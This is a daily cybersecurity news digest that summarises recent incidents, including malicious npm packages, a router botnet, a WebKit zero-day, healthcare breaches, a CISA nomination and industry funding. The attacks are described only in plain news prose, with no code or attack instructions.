Cyber Briefing: 2025.03.12
?? What's trending in cybersecurity today?
Lazarus Group, Fake npm Packages, Steal Crypto, Deploy Backdoors, Telecom Security, SIM Swap Attacks, Ballista Botnet, TP-Link Routers, Remote Code Execution, 苹果 WebKit, Zero-Day Vulnerability, Blind Eagle Hackers, Colombia, 谷歌 Drive, Dropbox , GitHub , Sunflower Medical Group , Data Exposure, San Francisco, City of Sausalito , Hacking Attempt, Yale New Haven Health , Northern Ireland, Belfast Health and Social Care Trust Trust, Patient Records, Moroccan Websites, Cyberattack, Donald Trump, Sean Plankey , US Cybersecurity Agency, Cybersecurity and Infrastructure Security Agency , UK Cybersecurity Industry, Revenue Growth, Job Increases, 思科 , Digital Skills, Insider Threats, Data Breaches, Sola Security , AI No-Code Security Platform.
?Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please subscribe.
The Lazarus Group has been caught hiding backdoors in six fake npm packages, which have been downloaded 330 times. These malicious packages are designed to steal user credentials, extract cryptocurrency wallet data, and install long-term malware. The packages, including typosquatting tactics, trick developers into installing them, leading to compromised systems. Developers are urged to carefully verify the legitimacy of packages and stay vigilant against such supply chain attacks.
SIM swap fraud remains a significant threat, despite efforts by telecom providers and regulators to enhance security. Fraudsters gain control of victims' phone numbers by tricking them into authorizing SIM swaps through phishing or social engineering tactics. They exploit telecom system vulnerabilities and bypass security safeguards like biometric authentication or e-verification platforms. This deception often involves fraudsters impersonating legitimate services like job applications or account updates to manipulate the victim.
A new botnet campaign known as Ballista is targeting vulnerable TP-Link Archer routers, exploiting a severe vulnerability (CVE-2023-1389) to conduct remote code execution attacks. This critical flaw affects TP-Link Archer AX-21 routers and has been actively exploited since April 2023. The Ballista botnet uses this vulnerability to drop Mirai and other types of malware onto infected devices. The flaw allows unauthorized access and control of routers, enabling further exploitation across the internet.
Apple recently released a security update to fix a critical zero-day vulnerability in WebKit, the engine used by Safari and other apps. The flaw allowed attackers to break out of WebKit’s sandbox, potentially accessing sensitive system data. It was exploited in highly targeted attacks before iOS 17.2, but the specific targets and hackers remain undisclosed. The patch is available for iPhones, iPads, Macs, Safari, and Vision Pro, addressing devices affected by versions of iOS and macOS prior to the latest release.
Blind Eagle (APT-C-36), one of Latin America's most dangerous cyber threat groups, has been targeting Colombia's justice system, government institutions, and private organizations with a series of ongoing attacks. These attacks use sophisticated techniques, including the exploitation of trusted cloud services like Google Drive, Dropbox, GitHub, and Bitbucket to distribute malware and bypass traditional security measures. The group's ability to weaponize .url files for passive victim tracking and malware delivery, combined with minimal user interaction, makes their campaigns particularly effective.
Sunflower Medical Group, a Kansas-based healthcare provider, experienced a cyberattack in December 2024, exposing the data of nearly 221,000 patients. Hackers infiltrated the company’s systems on December 15, stealing sensitive information, including Social Security numbers, medical records, and health insurance details. The Rhysida ransomware gang claimed responsibility for the attack, demanding a ransom of $800,000. While the company has not confirmed the involvement of ransomware in the breach, it has offered affected individuals identity theft protection services.
Sausalito’s City Council was forced to cancel a meeting after hackers launched over 190,000 attempts to breach its computer systems in less than 24 hours. The city’s enhanced security protocols, including complex user authentication, successfully blocked the attack. In response, the city is working with its technology contractor, Marin IT, to evaluate the attack’s full impact and reinforce security measures to prevent future breaches.
Yale New Haven Health, based in Connecticut, is investigating a cybersecurity incident that affected its IT services over the weekend. The healthcare system's digital and technology team identified the issue and, in partnership with cybersecurity firm Mandiant, confirmed it as a cyberattack. While patient care has not been impacted, intermittent phone and internet connectivity issues are being addressed as the organization works to restore full system access.
Twenty-eight computers containing thousands of patients’ records were stolen from a Belfast hospital, Northern Ireland. The stolen computers were used to train staff on the new Encompass system for digital healthcare records. While Belfast Health Trust confirmed no data breaches occurred and the missing computers couldn't access patient records, concerns were raised over the Trust's security measures. The theft, reported on March 5, is believed to have taken place over several months, prompting calls for urgent reassessment of security protocols.
Several official websites in Morocco experienced a cyberattack on March 9, rendering them inaccessible. Sites like the National Commission for the Protection of Personal Data and the ENCG of Kenitra were affected, displaying error messages or Chinese characters. This attack follows previous cybersecurity incidents in Morocco, which is ranked among the top 25 most targeted countries for cyberattacks worldwide. The attack exposed vulnerabilities in both public and private institutions.
?? Cyber News
Sean Plankey has been nominated by former President Donald Trump to lead the Cybersecurity and Infrastructure Security Agency (CISA), with the nomination now awaiting Senate approval. Plankey brings extensive experience in cybersecurity, having previously held key positions at the Department of Energy and the National Security Council during the first Trump administration. His role included working on maritime and Pacific cybersecurity policy and leading cybersecurity efforts at U.S. Cyber Command.
The UK’s cybersecurity industry achieved a 12% growth in revenue, reaching £13.2bn, showing strong performance. The sector also added 6600 full-time jobs, boosting the total to 67,300, with medium and large firms leading growth. Despite these advancements, challenges like skills shortages, high salary demands, and SME underinvestment persist, affecting the sector's future potential. The industry has seen significant progress but must address these long-standing issues to sustain growth and innovation.
Cisco has announced an ambitious plan to train 1.5 million individuals in digital skills across the European Union by 2030. This initiative, part of the Cisco Networking Academy, will focus on critical areas like AI, cybersecurity, and data science, aiming to address the growing demand for digital literacy. The courses, available in multiple languages, will be free and accessible to a wide audience, contributing to the EU’s Digital Decade targets. By partnering with educational institutions, Cisco hopes to ensure that the workforce is equipped with the necessary skills to thrive in a technology-driven economy.
Human error accounted for 95% of data breaches in 2024, driven mainly by insider threats, credential misuse, and user mistakes. A small group of employees were responsible for the majority of incidents, highlighting the need for more targeted security training. Despite regular employee training, breaches resulted in significant financial losses, averaging $13.9 million per event. Organizations are increasingly turning to AI tools to help defend against cyberattacks, though many still feel unprepared for AI-driven threats.
Sola Security, an Israeli startup founded in 2024 by cybersecurity veterans Guy Flechter and Ron Peled, secured $30 million in seed funding to develop a no-code security platform. The funding round was led by S Capital, Mike Moritz, S32, Glilot Capital Partners, and several angel investors. The company aims to simplify security by offering a platform where security teams can build and deploy custom applications without needing extensive technical expertise.
Subscribe and Comment.
Copyright ? 2025 CyberMaterial. All Rights Reserved.
Follow CyberMaterial on: